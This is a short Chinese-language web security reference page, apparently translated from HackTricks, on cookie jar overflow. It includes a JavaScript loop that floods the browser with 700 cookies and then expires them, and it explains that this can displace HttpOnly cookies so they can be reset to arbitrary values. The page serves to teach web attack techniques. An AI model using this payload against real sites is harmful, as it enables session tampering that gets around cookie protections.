Cookie溢出

浏览器对它们可以为页面存储的cookie数量有限制。这允许您通过添加新的cookie来取代cookie：

// 设置许多cookie
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// 删除所有cookie
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

指向不同域的第三方cookie不会被覆盖

Cookie jar溢出可用于覆盖 HttpOnly cookie，因此您可以删除它们并使用任意值重置。

参考资料

HackTricks: Cookie Jar Overflow
Overwriting HttpOnly cookies using cookie jar overflow

上一页Cookie炸弹下一页Cookie竞争

最后更新于5小时前